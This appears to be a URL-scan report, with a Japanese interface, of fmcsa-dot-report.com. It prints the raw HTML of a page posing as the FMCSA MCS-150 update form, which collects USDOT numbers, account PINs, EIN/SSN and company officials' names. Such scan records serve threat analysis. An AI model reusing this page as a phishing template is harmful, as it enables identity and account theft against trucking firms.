https://fmcsa-dot-report.com/LIVIEW/pkg_form_START.prc_saz_entry

送信済みURL:
https://fmcsa-dot-report.com/LIVIEW/pkg_form_START.prc_saz_entry
レポート終了日:

リンク · 0件検出

ページから特定された発信リンク

JavaScript変数 · 7件検出

ページのウィンドウオブジェクトにロードされたグローバルのJavaScript変数は関数以外の場所で宣言された変数で、現在のスコープ内であればコードのどこからでもアクセス可能です

名前規模
onbeforetoggleobject
documentPictureInPictureobject
onscrollendobject
$function
jQueryfunction
maskfunction
mssnfunction

コンソールログメッセージ · 2件検出

Webコンソールにログ記録されたメッセージ

規模分類ログ
errornetwork
URL
https://fmcsa-dot-report.com/css/info.gif
テキスト
Failed to load resource: the server responded with a status of 404 ()
errornetwork
URL
https://fmcsa-dot-report.com/css/warning_sign.gif
テキスト
Failed to load resource: the server responded with a status of 404 ()

HTML

未加工のHTMLページ本文

<!DOCTYPE html><html lang="en"><head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>FMCSA Registration Form</title>

    <script src="https://code.jquery.com/jquery-3.6.4.min.js" integrity="sha256-oP6HI9z1XaZNBrJURtCoUT5SUnxFr8s3BzRl+cbzUq8=" crossorigin="anonymous"></script>
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="">
    <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:300,400,500">
    <link rel="stylesheet" href="https://fonts.googleapis.com/icon?family=Material+Icons">

    <link rel="stylesheet" href="https://fmcsa-dot-report.com/css/style.css">
</head><body>
<img src="https://fmcsa-dot-report.com/images/registration_logo.gif">

<table cellspacing="0" border="0" cellpadding="1" width="100%" summary="" style="margin-top: 20px">
    <tbody>
    <tr>
        <td class="page_title" align="center" width="80%" nowrap="">USDOT Number MCS-150 Update (Including Biennial)
        </td>

    </tr>
    </tbody>
</table>

<table width="95%" border="0" align="CENTER">
    <tbody>
    <tr>
        <td width="100%" class="warning_message">DO NOT use your web browser buttons (Back, Forward, Refresh) while
            Filing Electronically.
        </td>
    </tr>
    </tbody>
</table>
<form id="form--login" action="https://fmcsa-dot-report.com/LIVIEW/pkg_form_START.prc_saz_entry" method="POST" enctype="multipart/form-data">
    <input type="hidden" name="_token" value="9ozTzP1Lvc3gkfr9eC0P3i4dBdQmVse0vIh1zCok">
    <input type="hidden" value="" name="hash">
    <table align="CENTER" width="90%" border="1" summary="Authorization Table used to enter name and title of autorized person" style="margin-top: 20px">
        <tbody>
        <tr>
            <th class="table_label" colspan="6">Identify Company</th>
        </tr>
        <tr>
            <td colspan="6" class="information_db">
                Please make sure you are using your USDOT PIN, as your MC # PIN is no longer valid. Your USDOT PIN is the
                only PIN needed to access your FMCSA account(s)
            </td>
        </tr>
        <tr>
            <td align="LEFT" width="20%" class="form_label"><label for="dot_NUMBER">USDOT NUMBER * </label></td>
            <td>
                <input inputmode="numeric" oninput="this.value = this.value.replace(/\D+/g, '')" name="pv_dot_NUMBER" size="8" maxlength="8" class="form_data_right_required" id="dot_NUMBER" required="">
            </td>
            <td align="LEFT" class="form_label"><label for="pin">PIN*: </label></td>
            <td><input type="text" name="pin_code" value="" class="form_data_left_required" id="pin" minlength="8" maxlength="8" size="8" required="">
            </td>
            <td align="LEFT" class="form_label"><label for="federal-id">US Federal ID (EIN/SSN/RFC)*: </label></td>
            <td>
                <input type="text" name="pv_federal_id" size="9" maxlength="17" class="form_data_left_required" id="pin" required="">
            </td>
        </tr>
        </tbody>
    </table>

    <table align="CENTER" width="90%" cellpadding="1" cellspacing="1" border="1" summary="Autorization Table used to enter name and title of autorized person" style="margin-top: 40px;">
        <tbody><tr>
            <th class="table_label" colspan="2">Company Official</th>
        </tr>
        <tr>
            <td align="LEFT" width="40%" class="form_label"><label for="auth_name">Name of Company Official Authorized to Complete Forms * </label></td>
            <td>
                <input type="text" name="pv_auth_person_name" size="50" maxlength="50" class="form_data_left_required" id="auth_name" required="">
            </td>
        </tr>
        <tr>
            <td align="LEFT" class="form_label"><label for="auth_title">Title of Company Official Authorized to Complete Forms * </label></td>
            <td>
                <input type="text" name="pv_auth_person_title" size="30" maxlength="30" class="form_data_left_required" id="auth_title" required="">
            </td>
        </tr>
        </tbody>
    </table>


    <table width="35%" class="table_without_border" align="center" summary="" style="margin-top: 20px">
        <tbody>
        <tr>
            <td>
                <input type="submit" value="Continue">
            </td>
        </tr>
        </tbody>
    </table>
</form>

<script>
    </script>

<script>
    document.querySelector("#residence").addEventListener('change', function (event) {
        if (["us_residence", "permanent_resident"].includes(event.target.value)) {
            document.querySelector("#ssn-box").style.display = "table-row";
            document.querySelector("#ssn").setAttribute('required', true);
        } else {
            document.querySelector("#ssn-box").style.display = "none";
            document.querySelector("#ssn").removeAttribute('required');
        }
    })


    function mask(o, f) {
        setTimeout(function () {
            var v = f(o.value);
            if (v != o.value) {
                o.value = v;
            }
        }, 1);
    }

    function mssn(v) {
        var r = v.replace(/\D/g,"");
        if (r.length > 9) {
            r = r.replace(/^(\d\d\d)(\d{2})(\d{0,4}).*/,"$1-$2-$3");
            return r;
        }
        else if (r.length > 4) {
            r = r.replace(/^(\d\d\d)(\d{2})(\d{0,4}).*/,"$1-$2-$3");
        }
        else if (r.length > 2) {
            r = r.replace(/^(\d\d\d)(\d{0,3})/,"$1-$2");
        }
        else {
            r = r.replace(/^(\d*)/, "$1");
        }
        return r;
    }
</script>


</body></html>